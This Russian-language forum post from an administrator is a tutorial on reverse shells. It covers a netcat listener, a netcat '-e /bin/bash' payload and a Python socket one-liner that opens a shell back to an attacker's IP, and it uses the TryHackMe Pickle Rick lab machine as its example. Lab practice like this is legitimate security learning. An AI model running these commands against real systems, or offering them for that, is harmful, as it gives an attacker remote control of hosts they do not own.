Добро пожаловать на BlackSAMP - ФОРУМ

  • Приватные и секретные разделы доступны только зарегистрированным пользователям.

    Вся важная информация в нашем ТГ: t.me/gtablack

    На данном форуме запрещено публиковать контент нарушающий Российское законодательство, за это последует блокировка ФА.

Обратная оболочка

DarkPhantom

Активный
Администратор
Регистрация
18 Авг 2024
Сообщения
93
Решения
2
Реакции
27
Баллы
28
Обратная оболочка (reverse shell) — это тип оболочки, при котором целевая машина подключается к машине атакующего, а не наоборот. Это позволяет обойти брандмауэры и другие сетевые ограничения, которые могут блокировать входящие соединения. Давайте разберем, как это работает.

На атакующей машине откройте терминал и запустите Netcat для прослушивания любого порта , у меня 4444:

Код:
nc -lvnp 4444

Здесь:
- -l указывает неткет прослушивать входящие соединения,
- -v включает режим отладки,
- -n предотвращает разрешение имен хостов,
- -p указывает порт.

Если у вас есть доступ к терминалу на атакуемой машине :
Код:
nc -e /bin/bash <your_ip> 4444

Здесь <your_ip> - это IP-адрес вашей атакующей машины, а 4444 - порт, который вы указали в неткете на атакующей машине.

Если доступ к терминалу ограничен или вы не можете использовать команды напрямую, вы можете использовать Python для создания обратной оболочки. Покажу на примере TryHackMe - машина Pickle Rick.
1000371689.jpg
Проверим на наличие Python
Код:
which python3
Если Python установлен, вы увидите путь к исполняемому файлу.
1000371690.jpg
Перейдите на сайт revshells.com, выберите Python, введите ваш IP-адрес и порт, и скопируйте сгенерированную команду.
Затем админ панели введите сгенерированную команду.
Python:
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("IP",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
Это создаст обратную оболочку, которая подключится к вашей атакующей машине на указанный порт.
 
Последнее редактирование:
Сверху Снизу